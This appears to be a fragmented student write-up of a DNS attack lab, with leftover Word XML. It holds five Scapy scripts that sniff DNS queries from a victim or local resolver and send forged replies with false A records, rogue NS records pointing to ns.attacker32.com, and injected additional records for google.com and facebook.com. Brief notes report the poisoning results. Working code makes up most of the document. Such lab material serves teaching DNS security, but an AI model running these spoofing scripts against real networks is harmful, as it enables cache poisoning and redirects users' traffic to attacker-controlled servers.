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 Directly Spoofing Response to User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Ip address of ww.example.com is spoofed successfully when running “dig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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">” smd in the user container.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victim user - 10.9.0.5 is passed as command line arguement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#!/bin/env python3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scapy.all import *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sys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= sys.argv[1]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spoof_dns(pkt):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(DNS in pkt and 'example.com' in pkt[DNS].qd.qname.decode('utf-8')):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old_ip = pkt[IP]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old_udp = pkt[UDP]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old_dns = pkt[DNS]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ip = IP(dst=old_ip.src,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src=old_ip.dst)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udp = UDP(dport=old_udp.sport,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sport=53)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Anssec = DNSRR(rrname=pkt[DNS].qd.qname,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type='A',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dns = DNS(id=pkt[DNS].id,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aa=1, qr=1, qdcount=1, ancount=1,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qd=pkt[DNS].qd,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an=Anssec)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spoofpkt = ip/udp/dns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send(spoofpkt)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'udp and (src host {} and dst port 53)'.format(target)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pkt = sniff(iface='br-a69a48571036', filter=f, prn=spoof_dns)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 DNS Cache Poisoning Attack – Spoofing Answers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local DNS server is spoofed with wrong IP address for example.com domain.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local DNS server - 10.9.0.53 is passed as command line argument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#!/bin/env python3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scapy.all import *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sys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= sys.argv[1]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spoof_dns(pkt):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(DNS in pkt and 'example.com' in pkt[DNS].qd.qname.decode('utf-8')):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old_ip = pkt[IP]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old_udp = pkt[UDP]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old_dns = pkt[DNS]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ip = IP(dst=old_ip.src,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src=old_ip.dst)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udp = UDP(dport=old_udp.sport,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sport=53)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Anssec = DNSRR(rrname=pkt[DNS].qd.qname,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type='A',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dns = DNS(id=pkt[DNS].id,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aa=1, qr=1, qdcount=1, ancount=1,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qd=pkt[DNS].qd,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an=Anssec)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spoofpkt = ip/udp/dns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send(spoofpkt)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3: Spoofing NS Records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  <w:t xml:space="preserve">The local DNS server is spoofed with wrong NS record entry for “example.com” domain.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local DNS server - 10.9.0.53 is passed as command line argument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#!/bin/env python3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scapy.all import *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sys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= sys.argv[1]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spoof_dns(pkt):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(DNS in pkt and 'example.com' in pkt[DNS].qd.qname.decode('utf-8')):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old_ip = pkt[IP]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old_udp = pkt[UDP]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old_dns = pkt[DNS]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ip = IP(dst=old_ip.src,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src=old_ip.dst)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udp = UDP(dport=old_udp.sport,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sport=53)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Anssec = DNSRR(rrname=pkt[DNS].qd.qname,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type='A',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NSsec1= DNSRR(rrname='example.com',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type='NS',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rdata='ns.attacker32.com',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dns = DNS(id=pkt[DNS].id,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aa=1, qr=1, qdcount=1, ancount=1,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qd=pkt[DNS].qd,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an=Anssec,ns=NSsec1)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spoofpkt = ip/udp/dns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send(spoofpkt)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'udp and (src host {} and dst port 53)'.format(target)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pkt = sniff(iface='br-a69a48571036', filter=f, prn=spoof_dns)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4: Spoofing NS Records for Another Domain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attack deemed to be successful as we spoofed the IP information for the user container. However only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entry has been cached, not for google.com.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local DNS server - 10.9.0.53 is passed as command line argument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#!/bin/env python3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scapy.all import *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sys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= sys.argv[1]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spoof_dns(pkt):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(DNS in pkt and 'example.com' in pkt[DNS].qd.qname.decode('utf-8')):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old_ip = pkt[IP]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old_udp = pkt[UDP]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old_dns = pkt[DNS]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ip = IP(dst=old_ip.src,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src=old_ip.dst)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udp = UDP(dport=old_udp.sport,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sport=53)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Anssec = DNSRR(rrname=pkt[DNS].qd.qname,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type='A',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NSsec1= DNSRR(rrname='example.com',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type='NS',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rdata='ns.attacker32.com',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NSsec2= DNSRR(rrname='google.com',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type='NS',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rdata='ns.example.net',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ttl=259200)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dns = DNS(id=pkt[DNS].id,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aa=1, qr=1, qdcount=1, ancount=1,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qd=pkt[DNS].qd,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an=Anssec,ns=NSsec1/NSsec2)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spoofpkt = ip/udp/dns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send(spoofpkt)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'udp and (src host {} and dst port 53)'.format(target)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pkt = sniff(iface='br-a69a48571036', filter=f, prn=spoof_dns)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5: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additional section data is not cached into the server while the authority section data has been successfully cached.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local DNS server - 10.9.0.53 is passed as command line argument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#!/bin/env python3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# Fill in code at the location of @@@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from scapy.all import *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import sys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target = sys.argv[1]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def spoof_dns(pkt):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if (DNS in pkt and 'example.com' in pkt[DNS].qd.qname.decode('utf-8')):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old_ip = pkt[IP]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old_udp = pkt[UDP]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old_dns = pkt[DNS]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ip = IP(dst=old_ip.src,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src=old_ip.dst)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udp = UDP(dport=old_udp.sport,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          sport=53)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Anssec = DNSRR(rrname=pkt[DNS].qd.qname,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   type='A',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NSsec1= DNSRR(rrname='example.com',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           type='NS',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          rdata='ns.attacker32.com',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NSsec2= DNSRR(rrname='google.com',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           type='NS',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           rdata='ns.example.net',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Addsec1= DNSRR(rrname='ns.attacker32.com',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               type='A',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               rdata='1.2.3.4',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Addsec2= DNSRR(rrname='ns.example.net',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           type='A',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           rdata='5.6.7.8',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Addsec3= DNSRR(rrname='www.facebook.com',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           type='A',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           rdata='3.4.5.6',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           ttl=259200)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dns = DNS(id=pkt[DNS].id,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      aa=1, qr=1, qdcount=1, ancount=1,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      qd=pkt[DNS].qd,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      an=Anssec,ns=NSsec1/NSsec2,ar=Addsec1/Addsec2/Addsec3)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spoofpkt = ip/udp/dns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send(spoofpkt)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f = 'udp and (src host {} and dst port 53)'.format(target)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pkt = sniff(iface='br-a69a48571036', filter=f, prn=spoof_dns)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yperlink" Target="http://www.example.com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://www.example.co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